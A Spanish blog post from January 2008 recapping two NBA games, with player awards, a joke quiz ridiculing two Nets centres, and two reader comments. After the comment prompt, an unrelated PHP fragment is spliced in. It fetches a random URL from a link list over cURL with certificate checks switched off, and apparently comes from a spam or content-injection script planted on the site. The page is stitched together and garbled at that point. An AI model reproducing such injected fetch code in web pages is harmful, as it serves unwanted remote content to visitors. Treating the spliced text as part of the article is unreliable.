La crónica (22/01/08)

23 de January de 2008 por MagicJohnson32

Anoche se disputaron únicamente dos partidos, en los que los cuatro equipos implicados mantuvieron sus respectivas rachas. Especialmente preocupante resulta la de los Nets, que tras perder en Sacramento suman ya seis derrotas consecutivas y cayeron a la novena plaza. En lo positivo, los Suns ganaron su quinto partido seguido y siguen líderes de la Conferencia Oeste. Veamos primero un resumen de lo ocurrido en estos encuentros:

A continuación, la crónica de los dos partidos disputados anoche:

Los Bucks no aprenden. Hace apenas 10 días, Steve Nash les anotó 35 puntos con 13 de 17 en tiros. Anoche, el canadiense se fue hasta los 37 con 13 de 23, además de 10 asistencias. Milwaukee se preocupó más de frenar a Stoudemire, algo que tampoco consiguió ya que Amaré firmó 19 puntos con 6 de 8 en tiros de campo y 7 de 7 en libres, 12 rebotes, 3 tapones y 2 robos. Raja Bell anotó otros 19 puntos y Marion logró 14. Pero el protagonista fue Nash, autor de 15 puntos en el último cuarto, en el que los Suns lograron un parcial de 37-22 para dar la vuelta a un marcador desfavorable y poner el 114-105 final. Redd, Bogut, Simmons y Villanueva fueron los mejores de los locales, que no pudieron contar con Mo Williams y ya suman tres derrotas seguidas y seis en los últimos siete partidos.

En Sacramento vieron, por fin, a su equipo al completo. Y la impresión es que puede que le hayan ido bien los problemas de lesiones del inicio de temporada porque a un quinteto de primer nivel, en el que ya aparecen Bibby, Kevin Martin y Artest, junto a Brad Miller y Moore, se añade un banquillo plenamente integrado y capaz de aportar, con Udrih y García a la cabeza. Anoche, los Kings lograron su victoria más abultada en dos años y pasaron por encima (94-128) de unos Nets que ya están fuera de posiciones de Playoffs. Carter fue el mejor de su equipo con 21 puntos y 8 asistencias pero Kidd estuvo especialmente apagado y se quedó en unos discretísimos 13 puntos, 5 asistencias y 2 rebotes. Tampoco estuvo mucho mejor Jefferson, que hizo 18 puntos, 4 rebotes y una asistencia. La mala noticia para los Kings fue la torcedura de tobillo sufrida por Salmons al poco de ingresar en cancha, aunque parece que no es grave y puede incluso que no se pierda ningún partido.nashvillanuevaredd

Nuestro MVP: lo dicho. 37 puntos en 37 minutos, 8 de 14 en tiros de 2, 5 de 9 en triples, 6 de 7 en libres, 10 asistencias, 4 rebotes, 2 recuperaciones, 2 pérdidas, 40 de eficiencia. Pero Steve Nash, al margen de una estadística sensacional, llevó a su equipo al triunfo ante los Bucks y mantiene a los Suns al frente del Oeste.

El rookie: en una noche con actuaciones bastante discretas de los novatos, el que mejor cumplió con su papel fue Spencer Hawes. Le está costando adaptarse a la NBA y sobre todo tiene problemas con la defensa, pero nadie duda de que Hawes es un pívot muy inteligente y con movimientos interesantes en ataque. Esta madrugada ha aprovechado la oportunidad que le ha brindado su entrenador y en 17 minutos ha anotado 6 puntos y recogido 5 rebotes.

La sorpresa: ya ha tenido alguna buena actuación apareciendo desde el banquillo. Anoche, Malik Allen fue de lo poco que se salvó por parte de los Nets. En menos de 19 minutos, Allen logró 14 puntos con 7 de 9 en tiros, 2 rebotes, 2 asistencias y un tapón. Ya no es tanta sorpresa que Beno Udrih juegue bien, sólo que ahora ya lo hace saliendo desde el banquillo ante el regreso de Mike Bibby. El esloveno anotó sus 5 tiros de campo, dos de ellos triples, y sus dos tiros libres, atrapó dos rebotes, asistió en tres ocasiones y puso un tapón, todo en menos de 18 minutos.

La decepción: No ha sido una buena noche para Leandro Barbosa, capaz de lo mejor y de lo peor. En 32 minutos de juego, el sexto hombre de Phoenix ha anotado sólo 3 canastas de 11 intentos para acabar con unos tristes 8 puntos.

Pasatiempos: ¿Qué trata de calcular mentalmente Jason Collins?

collinscarternetskingsA) los puntos anotados por él ante los Kings

B) los puntos anotados por su compañero Magloire ante los Kings

C) los puntos anotados entre él y Magloire ante los Kings

D) los puntos anotados entre él y Magloire en los últimos tres partidos

E) los puntos anotados por Magloire en todo el 2008

Respuesta correcta: cualquier de ellas, el resultado siempre es cero. El ganador será premiado con el primer tomo de la enciclopedia “Diez millones de maneras más provechosas de gastarse diez millones de dólares que dándoselos a Collins y Magloire”. Entre las posibilidades sugeridas se incluyen fichar a un pívot con más de una neurona, construir una estatua de bronce a Jason Kidd por los servicios prestados o quemar el dinero en las hogueras de San Juan. En realidad, cualquier cosa es mejor que pagar a Collins y Magloire.

 

Comenta

2 comentarios a esta entrada

  1. Hynreck dice:
    #1

    “En realidad, cualquier cosa es mejor que pagar a Collins y Magloire”

    ….

    ….

    …. si lo sabré yo…

      Citar

  2. MagicJohnson32 dice:
    #2

    Creo que te has llevado la enciclopedia xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>